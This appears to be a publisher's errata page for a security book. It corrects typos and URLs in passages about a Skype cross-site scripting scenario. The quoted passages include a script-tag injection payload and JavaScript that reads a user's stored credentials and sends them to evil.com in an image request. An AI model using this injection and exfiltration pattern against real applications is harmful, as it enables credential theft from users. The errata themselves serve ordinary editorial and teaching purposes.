The errata list is a list of errors and their corrections that were found after the product was released. If the error was corrected in a later version or reprint the date of the correction will be displayed in the column titled "Date Corrected".
The following errata were submitted by our customers and approved as valid errors by the author or editor.
Color key: Serious technical mistake Minor technical mistake Language or formatting error Typo Question Note Update
| Version |
Location |
Description |
Submitted By |
Date submitted |
Date corrected |
| Printed, PDF, ePub |
Page 145
Top of page |
The URL on the second line of this section is incorrect:
The researchers took things further with a scenario in which the mood message of the malicious Skype user was the following:
<script src="http://tv.isecpartners.com/exfil.js"></script>
Now assume exfil.js contains JavaScript code like this:
creds = PluginAPIMgr.GetMyStorageInfo();
new Image().src="http://evil.com/"+creds;
It should actually read like so:
The researchers took things further with a scenario in which the mood message of the malicious Skype user was the following:
<script src="http:/evil.com/exfil.js"></script>
Now assume ex l.js contains JavaScript code like this:
creds = PluginAPIMgr.GetMyStorageInfo();
new Image().src="http://evil.com/"+creds;
|
dawnsft |
Jan 21, 2016 |
|
| Printed, PDF, ePub |
Page 144
Middle of page |
The URL on the second line of this section is incorrect:
Now imagine a mood message like the following:
<script src="http://tv.isecpartners.com/reboot.js"></script>
Suppose someone sent you a message on Skype with this as his mood message. You’d expect the app to actually display the mood message as <script src="http://evil.com/reboot.js"></script>.
Instead, it should read like this:
Now imagine a mood message like the following:
<script src="http://evil.com/reboot.js"></script>
Suppose someone sent you a message on Skype with this as his mood message. You’d expect the app to actually display the mood message as <script src="http://evil.com/reboot.js"></script>.
|
dawnsft |
Jan 21, 2016 |
|
| Printed, PDF, ePub |
Page 246-247
Bottom of 246-top of 247 |
Some HTML formatting accidentally appears in this sentence:
"For example, tampering with an <span class="keep-together">individual’s</span> heart rate statistics..."
Should instead read like so:
"For example, tampering with an individual’s heart rate statistics..."
Note from the Author or Editor:
Agreed with submitter - this is accidental markup that can be removed. |
Dawn |
Jan 04, 2016 |
|